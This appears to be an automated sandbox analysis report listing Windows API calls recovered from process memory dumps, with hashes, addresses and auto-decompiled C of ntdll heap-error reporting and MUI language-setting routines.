PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 009972DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 009972FB

Memory Dump Source

Source File: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Offset: 00990000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 8f1fd1d9456a355b74d261fdbf160877b2cc2eabf2610664002d87684ce65099
Instruction ID: a013ac06a1f53040fc3b173b4671ec5252d9e25e02e8083b6bd31c2332c43d04
Opcode Fuzzy Hash: 8f1fd1d9456a355b74d261fdbf160877b2cc2eabf2610664002d87684ce65099
Instruction Fuzzy Hash: AC01A731A9022977EB21A6989C03FBEB76C5B41F51F144118FF04BA1C1EA94690586F6

Uniqueness

Uniqueness Score: -1.00%

Function 00999B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00999BB2

Memory Dump Source

Source File: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Offset: 00990000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
Instruction ID: 86547fd5b63c63fe0b8597be1baaab5001c163b4be09863076d2bf4919257d7d
Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
Instruction Fuzzy Hash: 73011EB6D0020DABDF10DBA4EC42F9DB7B89B54318F0441A5E90897281F635EB54CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009A8940, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 009A8994

Memory Dump Source

Source File: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Offset: 00990000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 880b795a0ca58ed7847c9d3bdbca7c85a88ca3230fe17af3cea6b9d3bc6b8053
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: A801B2B2214108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 009A7410, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0099CCF0,?,?), ref: 009A744C

Memory Dump Source

Source File: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Offset: 00990000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 8e1393f0d913575f1db8de2dab859c78e410f61a9b540c9433875871d25525b2
Instruction ID: 9c29565d48583e70e25ea4d933bb87ac3f5b23b48979f4bff9e2b166157e3e68
Opcode Fuzzy Hash: 8e1393f0d913575f1db8de2dab859c78e410f61a9b540c9433875871d25525b2
Instruction Fuzzy Hash: 9AE06D333812043AE22065999C03FA7B79C9B92B24F140026FA0DEA6C1D595F90142E4

Uniqueness

Uniqueness Score: -1.00%

Function 009A7405, Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0099CCF0,?,?), ref: 009A744C

Memory Dump Source

Source File: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Offset: 00990000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: a5bb84c520cd5baa846f2ecb85cea0655a35f3fb715c421183178a6356d5db06
Instruction ID: 68398a092a2c22190897870e5fe30bab715e358f30f4cfa6b21b74fe4094a9cf
Opcode Fuzzy Hash: a5bb84c520cd5baa846f2ecb85cea0655a35f3fb715c421183178a6356d5db06
Instruction Fuzzy Hash: 33F02B327403003BD3306A98CC03F97B79CDFC5B14F500018FB09AB6C1D9A1B90082D5

Uniqueness

Uniqueness Score: -1.00%

Function 009A8A21, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0099CFC2,0099CFC2,?,00000000,?,?), ref: 009A8A60

Memory Dump Source

Source File: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Offset: 00990000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 25c751f6cea03d52fb19e9ef676e4eab3304c7d1acb5534e7f57743fe7cf092d
Instruction ID: b036498573c2e254d9648b5695d771a90b957b820d25f198663ba1d332cab146
Opcode Fuzzy Hash: 25c751f6cea03d52fb19e9ef676e4eab3304c7d1acb5534e7f57743fe7cf092d
Instruction Fuzzy Hash: 39F039B2604215AFDB24DF54CC89EEBB769EF85314F0585A8FD08AB241DA31A915CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 009A8890, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(009A3536,?,009A3CAF,009A3CAF,?,009A3536,?,?,?,?,?,00000000,00000000,?), ref: 009A88BD

Memory Dump Source

Source File: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Offset: 00990000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 7564c935ba2c9554f5b51fbb37ecb3b89bc68f8200fe89a448d9627326ef6d2b
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 6AE012B1200208ABDB14EF99CC85EA777ACAF88650F118558BA085B242C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 009A8A30, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0099CFC2,0099CFC2,?,00000000,?,?), ref: 009A8A60

Memory Dump Source

Source File: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Offset: 00990000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 1c37ea397373d8405ef3af30304d4096f2231b36b4e638cdab2499a1685fb79c
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 65E01AB12002086BDB10DF49CC85EE737ADAF89650F018554BA0857241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0099D430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00997C83,?), ref: 0099D45B

Memory Dump Source

Source File: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, Offset: 00990000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
Instruction ID: bb4964bc55ac615da4b3133708e12dd75c024d67d853d5fedd00e5a3cb0fff21
Opcode Fuzzy Hash: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
Instruction Fuzzy Hash: CFD0A7717503043BEB10FAA89C03F2673CC5B45B40F494064FA48D73C3D960F5008161

Uniqueness

Uniqueness Score: -1.00%

Function 04BA967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BA9694

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cfc767d5ca667077cb272bd09bb9b74339b124b427694e94de4e7bf60fb822ad
Instruction ID: 8f1aa3137cfa6c9b9a04b6a9ebb7cdba60fd7b87cf2d04bb0251b834d4b59b0f
Opcode Fuzzy Hash: cfc767d5ca667077cb272bd09bb9b74339b124b427694e94de4e7bf60fb822ad
Instruction Fuzzy Hash: E4B09BB29054D5C6F751D76446087277904FBD4745F16C4A5D1420641A477CE0A1F5F5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04C1B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** then kb to get the faulting stack, xrefs: 04C1B51C
The critical section is owned by thread %p., xrefs: 04C1B3B9
*** Inpage error in %ws:%s, xrefs: 04C1B418
*** enter .exr %p for the exception record, xrefs: 04C1B4F1
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 04C1B47D
a NULL pointer, xrefs: 04C1B4E0
<unknown>, xrefs: 04C1B27E, 04C1B2D1, 04C1B350, 04C1B399, 04C1B417, 04C1B48E
The resource is owned shared by %d threads, xrefs: 04C1B37E
The instruction at %p tried to %s , xrefs: 04C1B4B6
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 04C1B2DC
*** A stack buffer overrun occurred in %ws:%s, xrefs: 04C1B2F3
*** Resource timeout (%p) in %ws:%s, xrefs: 04C1B352
write to, xrefs: 04C1B4A6
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 04C1B314
This failed because of error %Ix., xrefs: 04C1B446
The resource is owned exclusively by thread %p, xrefs: 04C1B374
read from, xrefs: 04C1B4AD, 04C1B4B2
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 04C1B53F
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 04C1B39B
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04C1B3D6
The instruction at %p referenced memory at %p., xrefs: 04C1B432
*** enter .cxr %p for the context, xrefs: 04C1B50D
an invalid address, %p, xrefs: 04C1B4CF
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 04C1B484
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04C1B38F
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 04C1B476
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 04C1B323
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 04C1B305
*** An Access Violation occurred in %ws:%s, xrefs: 04C1B48F
Go determine why that thread has not released the critical section., xrefs: 04C1B3C5

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 473e14bfc30034c2ed4d5f81160ede262d08efd82c3aec6c7811afb4276bb373
Instruction ID: 28642c17b7722d1b2897e1814581cbc28575871da7f4c4d3a9a4d57d7395b169
Opcode Fuzzy Hash: 473e14bfc30034c2ed4d5f81160ede262d08efd82c3aec6c7811afb4276bb373
Instruction Fuzzy Hash: 1A81D235A00200FBEB216B158C45E6A7F2BAF47B55F4481C4FA086B132F665B951EFA2

Uniqueness

Uniqueness Score: -1.00%

Function 04C21C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E04C21C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x4b448a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04B6B150();
				} else {
					E04B6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x4c5589c);
				E04B6B150("Heap error detected at %p (heap handle %p)\n",  *0x4c558a0);
				_t27 =  *0x4c55898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M04C21E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04B6B150();
				} else {
					E04B6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E04B6B150("Error code: %d - %s\n",  *0x4c55898);
				_t113 =  *0x4c558a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04B6B150();
					} else {
						E04B6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04B6B150("Parameter1: %p\n",  *0x4c558a4);
				}
				_t115 =  *0x4c558a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04B6B150();
					} else {
						E04B6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04B6B150("Parameter2: %p\n",  *0x4c558a8);
				}
				_t117 =  *0x4c558ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04B6B150();
					} else {
						E04B6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04B6B150("Parameter3: %p\n",  *0x4c558ac);
				}
				_t119 =  *0x4c558b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04B6B150();
					} else {
						E04B6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x4c558b4);
					E04B6B150("Last known valid blocks: before - %p, after - %p\n",  *0x4c558b0);
				} else {
					_t120 =  *0x4c558b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04B6B150();
				} else {
					E04B6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E04B6B150("Stack trace available at %p\n", 0x4c558c0);
			}

0x04c21c10
0x04c21c16
0x04c21c1e
0x04c21c3d
0x04c21c3e
0x04c21c20
0x04c21c35
0x04c21c3a
0x04c21c44
0x04c21c55
0x04c21c5a
0x04c21c65
0x04c21c67
0x00000000
0x04c21c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04c21c67
0x04c21cdc
0x04c21ce5
0x04c21d04
0x04c21d05
0x04c21ce7
0x04c21cfc
0x04c21d01
0x04c21d0b
0x04c21d17
0x04c21d1f
0x04c21d25
0x04c21d30
0x04c21d4f
0x04c21d50
0x04c21d32
0x04c21d47
0x04c21d4c
0x04c21d61
0x04c21d67
0x04c21d68
0x04c21d6e
0x04c21d79
0x04c21d98
0x04c21d99
0x04c21d7b
0x04c21d90
0x04c21d95
0x04c21daa
0x04c21db0
0x04c21db1
0x04c21db7
0x04c21dc2
0x04c21de1
0x04c21de2
0x04c21dc4
0x04c21dd9
0x04c21dde
0x04c21df3
0x04c21df9
0x04c21dfa
0x04c21e00
0x04c21e0a
0x04c21e13
0x04c21e32
0x04c21e33
0x04c21e15
0x04c21e2a
0x04c21e2f
0x04c21e39
0x04c21e4a
0x04c21e02
0x04c21e02
0x04c21e08
0x00000000
0x00000000
0x04c21e08
0x04c21e5b
0x04c21e7a
0x04c21e7b
0x04c21e5d
0x04c21e72
0x04c21e77
0x04c21e95

Strings

heap_failure_buffer_underrun, xrefs: 04C21C9F
heap_failure_entry_corruption, xrefs: 04C21C83
heap_failure_invalid_allocation_type, xrefs: 04C21CB4
Parameter2: %p, xrefs: 04C21DA5
heap_failure_cross_heap_operation, xrefs: 04C21CC2
heap_failure_usage_after_free, xrefs: 04C21CBB
Stack trace available at %p, xrefs: 04C21E86
Parameter3: %p, xrefs: 04C21DEE
HEAP[%wZ]: , xrefs: 04C21C30, 04C21CF7, 04C21D42, 04C21D8B, 04C21DD4, 04C21E25, 04C21E6D
Heap error detected at %p (heap handle %p), xrefs: 04C21C50
heap_failure_listentry_corruption, xrefs: 04C21CD0
Error code: %d - %s, xrefs: 04C21D12
heap_failure_internal, xrefs: 04C21C6E
heap_failure_invalid_argument, xrefs: 04C21CAD
Parameter1: %p, xrefs: 04C21D5C
HEAP: , xrefs: 04C21C16, 04C21C3D, 04C21D04, 04C21D4F, 04C21D98, 04C21DE1, 04C21E32, 04C21E7A
heap_failure_lfh_bitmap_mismatch, xrefs: 04C21CD7
heap_failure_generic, xrefs: 04C21C7C
Last known valid blocks: before - %p, after - %p, xrefs: 04C21E45
heap_failure_buffer_overrun, xrefs: 04C21C98
heap_failure_freelists_corruption, xrefs: 04C21CC9
heap_failure_block_not_busy, xrefs: 04C21CA6
heap_failure_unknown, xrefs: 04C21C75
heap_failure_virtual_block_corruption, xrefs: 04C21C91
heap_failure_multiple_entries_corruption, xrefs: 04C21C8A

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: fc8c97cd545fb4981561c59085b8d7935b91db3de79d6f9e044d5ef36289f534
Instruction ID: b6f5783bd45589758b75d2ca0eac26cd73cacd553c4c890ce18d546d17afe5e8
Opcode Fuzzy Hash: fc8c97cd545fb4981561c59085b8d7935b91db3de79d6f9e044d5ef36289f534
Instruction Fuzzy Hash: EC61EB3F664275EFE2119B45D584F34B3B5E704A34B0D40E9F80AAB320DEA8FD919E09

Uniqueness

Uniqueness Score: -1.00%

Function 04B73D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E04B73D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E04B71B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E04B71B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E04B71B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E04B71B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E04B71B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L04B84620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E04BAF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E04BB1370(_t276, 0x4b44e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E04BABB40(0,  &_v68, _t170);
									if(L04B743C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E04BABB40(_t257,  &_v68, _t243);
								if(L04B743C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E04BB1370(_t278, 0x4b44e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L04B84620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E04BAF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E04BB1370(_v16, 0x4b44e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E04BABB40(_t262,  &_v68, _t244);
								if(L04B743C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E04BB1370(_t282, 0x4b44e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E04BABB40(_t262,  &_v68, _t201);
							if(L04B743C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L04B84620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E04BAF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E04BB1370(_t280, 0x4b44e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E04BABB40(_t267,  &_v68, _t245);
							if(L04B743C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E04BB1370(_t284, 0x4b44e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E04BABB40(_t267,  &_v68, _t224);
						if(L04B743C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x04b73d3c
0x04b73d42
0x04b73d44
0x04b73d46
0x04b73d49
0x04b73d4c
0x04b73d4f
0x04b73d52
0x04b73d55
0x04b73d58
0x04b73d5b
0x04b73d5f
0x04b73d61
0x04b73d66
0x04bc8213
0x04bc8218
0x04b74085
0x04b74088
0x04b7408e
0x04b74094
0x04b7409a
0x04b740a0
0x04b740a6
0x04b740a9
0x04b740af
0x04b740b6
0x04b740bd
0x04b740bd
0x04b73d83
0x04bc821f
0x04bc8229
0x04bc8238
0x04bc8238
0x04bc823d
0x04bc823d
